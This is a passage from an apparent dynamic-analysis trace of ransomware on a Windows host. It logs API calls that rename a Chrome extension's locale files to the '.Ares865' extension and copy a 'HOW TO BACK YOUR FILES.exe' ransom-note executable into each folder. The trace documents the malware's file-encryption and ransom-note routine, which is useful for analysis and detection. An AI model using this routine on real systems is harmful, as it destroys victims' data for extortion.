data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\messages.json.ares865"), dwFlags=0x1) returned 1 [0103.945] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.946] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=234) returned 1 [0103.951] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da" [0103.951] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da" [0103.951] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0103.951] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\how to back your files.exe"), bFailIfExists=1) returned 0 [0103.952] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0103.952] GetLastError () returned 0x0 [0103.953] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0103.953] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4f219000, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4f219000, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0103.953] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0103.953] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0103.953] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\messages.json.Ares865") returned 160 [0103.953] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\messages.json.ares865"), dwFlags=0x1) returned 1 [0103.957] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.958] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=224) returned 1 [0103.961] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs" [0103.961] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs" [0103.961] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0103.961] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\how to back your files.exe"), bFailIfExists=1) returned 0 [0103.962] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0103.962] GetLastError () returned 0x0 [0103.963] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0103.963] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4f219000, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4f219000, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0103.963] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0103.963] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0103.963] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\messages.json.Ares865") returned 160 [0103.963] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\messages.json.ares865"), dwFlags=0x1) returned 1 [0103.964] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.965] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=224) returned 1 [0103.983] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca" [0103.983] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca" [0103.983] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0103.983] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\how to back your files.exe"), bFailIfExists=1) returned 0 [0103.984] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0103.984] GetLastError () returned 0x0 [0103.984] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0103.984] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4f219000, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4f219000, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0103.985] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0103.985] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0103.985] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\messages.json.Ares865") returned 160 [0103.985] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\messages.json.ares865"), dwFlags=0x1) returned 1 [0103.986] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.987] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=224) returned 1 [0103.991] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg" [0103.991] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg" [0103.991] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0103.991] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\how to back your files.exe"), bFailIfExists=1) returned 0 [0103.992] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0103.992] GetLastError () returned 0x0 [0103.992] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0103.992] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4f23f160, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4f23f160, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0103.994] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0103.994] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0103.994] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\messages.json.Ares865") returned 160 [0103.995] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\messages.json.ares865"), dwFlags=0x1) returned 1 [0103.997] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.998] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=272) returned 1 [0104.001] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar" [0104.001] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar" [0104.002] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.002] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.002] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.003] GetLastError () returned 0x0 [0104.003] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.003] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857953d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4f23f160, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4f23f160, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.003] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.003] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.003] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\messages.json.Ares865") returned 160 [0104.003] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\messages.json.ares865"), dwFlags=0x1) returned 1 [0104.004] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0104.005] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=257) returned 1 [0104.008] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extension State", 